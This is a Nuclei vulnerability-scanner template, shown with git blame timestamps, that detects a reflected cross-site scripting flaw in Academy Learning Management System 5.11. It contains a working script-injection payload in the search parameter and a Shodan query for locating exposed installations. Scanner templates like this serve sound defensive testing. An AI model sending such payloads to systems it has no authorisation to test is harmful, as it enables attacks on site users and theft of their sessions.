nuclei-templates/vulnerabilities/other/academy-lms-xss.yaml

45 lines
1.3 KiB
YAML
Raw Normal View History

id: academy-lms-xss
2023-01-22 18:32:57 +00:00
info:
name: Academy Learning Management System 5.11 - Cross-Site Scripting
2023-01-22 18:32:57 +00:00
author: arafatansari
severity: medium
description: |
Academy Learning Management System 5.11 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-01-22 18:32:57 +00:00
reference:
- https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
- https://vulners.com/packetstorm/PACKETSTORM:170514
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
metadata:
2023-01-22 18:32:57 +00:00
verified: "true"
2023-01-23 09:54:33 +00:00
shodan-query: http.html:"Academy LMS"
tags: packetstorm,lms,academy,xss
2023-01-22 18:32:57 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
2023-01-22 18:32:57 +00:00
matchers-condition: and
matchers:
- type: word
2023-01-22 18:32:57 +00:00
part: body
words:
- '<script>alert(document.domain)</script>'
- 'Academy LMS'
condition: and
2023-01-23 09:54:33 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by md on 2023/03/23